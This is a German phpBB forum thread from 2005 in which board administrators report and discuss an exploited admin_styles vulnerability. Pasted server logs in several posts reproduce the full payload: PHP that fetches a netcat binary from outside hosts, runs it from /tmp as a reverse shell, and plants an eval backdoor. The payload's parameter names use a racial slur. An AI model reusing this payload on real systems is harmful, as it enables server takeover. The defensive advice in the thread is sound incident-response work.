Wer oder was war das?

Probleme bei der regulären Arbeiten mit phpBB, Fragen zu Vorgehensweisen oder Funktionsweise sowie sonstige Fragen zu phpBB im Allgemeinen.
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Antworten
testit
Mitglied
Beiträge: 234
Registriert: 04.06.2001 02:00

phpBB User id Auth. Bypass and "admin_styles" Code

Beitrag von testit »

Weitere Infos unter:
http://www.k-otik.com/exploits/20050314 ... xp.cpp.php

Code: Alles auswählen

62.211.199.89 - - [16/Mar/2005:14:47:24 +0100] RewriteCond: input='mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp
&sid=3e71233195f4756fe8b3dd1134a685a5&niggaip=62.211.199.89
&niggaport=6060&nigga=$a=fopen("http://img58.exs.cx/img58/1584/nc4hk.swf","r")
;$b="";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);$a=fopen("/tmp/.sess_","w");fwrite($a,$b);fclose($a);chmod("/tmp/.sess_",0777)
;system("/tmp/.sess_%20".$_REQUEST[niggaip]."%20".$_REQUEST[niggaport]."%20-e%20/bin/sh");' pattern='^(.*)highlight=\%2527' => no                                                                                                                                                                                      
62.211.199.89 - - [16/Mar/2005:14:47:24 +0100] RewriteCond: input='mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp
&sid=3e71233195f4756fe8b3dd1134a685a5&niggaip=62.211.199.89
&niggaport=6060&nigga=$a=fopen("http://img58.exs.cx/img58/1584/nc4hk.swf","r")
;$b="";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);$a=fopen("/tmp/.sess_","w");fwrite($a,$b);fclose($a);chmod("/tmp/.sess_",0777)
;system("/tmp/.sess_%20".$_REQUEST[niggaip]."%20".$_REQUEST[niggaport]."%20-e%20/bin/sh");' pattern='^(.*)rush=\%65\%63\%68' => n                                                                                                                                                                                      
62.211.199.89 - - [16/Mar/2005:14:47:24 +0100] RewriteCond: input='mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp
&sid=3e71233195f4756fe8b3dd1134a685a5&niggaip=62.211.199.89
&niggaport=6060&nigga=$a=fopen("http://img58.exs.cx/img58/1584/nc4hk.swf","r")
;$b="";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);$a=fopen("/tmp/.sess_","w");fwrite($a,$b);fclose($a);chmod("/tmp/.sess_",0777)
;system("/tmp/.sess_%20".$_REQUEST[niggaip]."%20".$_REQUEST[niggaport]."%20-e%20/bin/sh");' pattern='^(.*)rush=echo' => not-match                                                                                                                                                                                      
62.211.199.89 - - [16/Mar/2005:14:47:24 +0100] RewriteCond: input='mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp
&sid=3e71233195f4756fe8b3dd1134a685a5&niggaip=62.211.199.89
&niggaport=6060&nigga=$a=fopen("http://img58.exs.cx/img58/1584/nc4hk.swf","r")
;$b="";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);$a=fopen("/tmp/.sess_","w");fwrite($a,$b);fclose($a);chmod("/tmp/.sess_",0777)
;system("/tmp/.sess_%20".$_REQUEST[niggaip]."%20".$_REQUEST[niggaport]."%20-e%20/bin/sh");' pattern='^(.*)wget\%20' => not-matche


Wie man sieht, versagen die üblichen rewrites. "system wird wohl nicht abgefangen, da kein "e" vor den verbreiteten Conditions steht.

Weiss jemand, ob die 2.0.13 auch gegen dieses Ding sicher ist? Nachdem, was ich gelesen habe, soll das Problem eigentlich nur bei PHP < 4.10.3 auftauchen. Ich habe aber 4.10.3.

Meiner Ansicht nach macht die ewige Hinterherrennerei nach neuen Updates fuer phpBB2 weniger Sinn als Abfang-Versuche auf niedrigerer Ebene, die sich dann auch bei anderen PHP-Applikationen positiv auswirken, bspw. "mod_security".

Ach ja, noch ein kleiner Hinweis: Wer Shell-Zugriff hat, sollte mal nach Prozessen Ausschau halten, die unter dem Apache-User laufen (i.d.R. www) und "ps" heissen ;-)


Nette Grüsse

testit
Nach oben
Business
Mitglied
Beiträge: 142
Registriert: 03.09.2004 06:08

Beitrag von Business »

Hallo :)

Eine Frage, undzwar wurde mein Forum auch "angegriffen" auch dummerweise version 2.11, dachte da Update wär nich so wichtig :oops:

nun steht in den Logs:

Code: Alles auswählen

 
216.247.121.173 - - [22/Mar/2005:05:53:17 +0100] "GET / HTTP/1.1" 200 10920 "http:// www . meinedomain.de" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.247.121.173 - - [22/Mar/2005:05:53:21 +0100] "GET / HTTP/1.1" 200 12499 "http:// www . meinedomain.de" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.247.121.173 - - [22/Mar/2005:05:53:21 +0100] "GET /admin/admin_db_utilities.php?perform=backup&additional_tables=
&backup_type=structure&drop=1&backupstart=1&gzipcompress=0&startdownload=1&sid=1e64fc017c26c87a0cf48ca19fe88925 HTTP/1.1" 200 13316 "http:// www . meinedomain.de/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.247.121.173 - - [22/Mar/2005:05:53:22 +0100] "POST /admin/admin_db_utilities.php?sid=1e64fc017c26c87a0cf48ca19fe88925 HTTP/1.1" 200 1393 "http:// www . meinedomain.de" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.247.121.173 - - [22/Mar/2005:05:53:23 +0100] "POST /admin/admin_styles.php?mode=export&sid=1e64fc017c26c87a0cf48ca19fe88925 HTTP/1.1" 200 15898 "http:// www . meinedomain.de/admin/admin_styles.php?mode=export" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.247.121.173 - - [22/Mar/2005:05:53:23 +0100] "GET /admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=
1e64fc017c26c87a0cf48ca19fe88925&niggaip=216.247.121.173&niggaport=22&nigga=$a=fopen
(\"http://overdose.tcpteam.org/background/nc.elf\",\"r\");$b=\"\";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);$a=fopen
(\"/tmp/.sesss_\",\"w\");fwrite($a,$b);fclose($a);chmod(\"/tmp/.sesss_\",0777);system
(\"/tmp/.sesss_%20\".$_REQUEST[niggaip].\"%20\".$_REQUEST[niggaport].\"%20-e%20/bin/sh\"); HTTP/1.1" 200 10909 "http:// www . meinedomain.de" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Das Augenmerk liegt auf "backup", ist es möglich das die sich ein Datenbank Backup gemacht haben? :-?

Sonst ist nichts passiert, ausser das ein style nun aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp heisst :)
Nach oben
Benutzeravatar
DJBase
Mitglied
Beiträge: 110
Registriert: 27.09.2003 17:45
Kontaktdaten:
Kontaktdaten von DJBase

Beitrag von DJBase »

Ich hatte das gleiche Problem gestern in meinem Forum gehabt, allerdings habe ich 2.0.13 schon laufen?
Nach oben
Benutzeravatar
larsneo
Mitglied
Beiträge: 2622
Registriert: 07.03.2002 15:23
Wohnort: schwäbisch gmünd
Kontaktdaten:
Kontaktdaten von larsneo

Beitrag von larsneo »

dringende empfehlung (wie auch in den docs beschrieben) für alle versionen:
sichert den /admin folder durch eine zusätzliche .htaccess vor externem zugriff ab!
gruesse aus dem wilden sueden
larsneo
..::[krapohl.net]::..
Nach oben
Dave
Mitglied
Beiträge: 2085
Registriert: 25.05.2003 15:03
Wohnort: Wuppertal

Beitrag von Dave »

~erledigt~
MfG
Dave
Nach oben
RPS
Mitglied
Beiträge: 35
Registriert: 29.08.2004 12:26
Kontaktdaten:
Kontaktdaten von RPS

Beitrag von RPS »

Jup, und auch mein Board hatte heute das geleiche;
http://www.vgamers.de/phpbb/index.php

Alle Styles gelöcht, ein neuer namens FI Black und Fehler "aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp"

Mein Board is noch auf 2.0.10 :oops:
Könnt ihr mir sagen was ich außer dem Upgraden noch machen muss?
Nach oben
testit
Mitglied
Beiträge: 234
Registriert: 04.06.2001 02:00

Beitrag von testit »

RPS hat geschrieben:Jup, und auch mein Board hatte heute das geleiche;
http://www.vgamers.de/phpbb/index.php

Alle Styles gelöcht, ein neuer namens FI Black und Fehler "aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp"

Mein Board is noch auf 2.0.10 :oops:
Könnt ihr mir sagen was ich außer dem Upgraden noch machen muss?
Hi,

ausser den Updates noch eine .htaccess-Datei im Stammverzeichnis Deines Boards einstellen, wenn Dir das möglich ist:
http://www.phpbb.de/viewtopic.php?t=73948

Sicherstellten, dass die .htaccess auf "greift", d.h. dass der Webserver die .htaccess-Einstellungen auch einliest. Dieses Mechanismus kann nämlich auch abgeschaltet sein.

Wenn irgendwie möglich, solltest Du checken, ob auf Deinem Webserver Prozesse laufen, die da nicht hingehören (vor allem Perl-Prozesse). Es gibt auch Wurm-Varianten, die IRC-Server, SFTP und/oder ssh-Server auf dem Server durch den Wurm einschleussen, Diese müssen natürlich gekillt werden.

Gruss
testit
Nach oben
derfreddy

Beitrag von derfreddy »

bei mir wars das gleiche

nur war ich so neugierig, das leere template einzustellen
über dem mysteriösen nigga FI Black war nämlich noch eine auswahl, die nich benannt war

jedenfalls wird jetzt auf kein template mehr zugegriffen, sodass ich nichtmehr in den admin-bereich komme und folgende fehlermeldung erhalte..
phpBB : Kritischer Fehler

Could not open template config file

DEBUG MODE

Line : 1537
File : /var/www/free.fr/3/2/derfreddy/phpBB2/includes/functions.php
kann mir jemand sagen, wie ich das ursprüngliche template wieder einstelle?
Nach oben
derfreddy

Beitrag von derfreddy »

also ich möchte den style ändern, komm aber nichmehr in den administrationsbereich

hilfe bitte?
Nach oben
pandorra
Mitglied
Beiträge: 210
Registriert: 18.04.2005 17:45

Beitrag von pandorra »

suchfunktion
Nach oben
Antworten

Zurück zu „phpBB 2.0: Administration, Benutzung und Betrieb“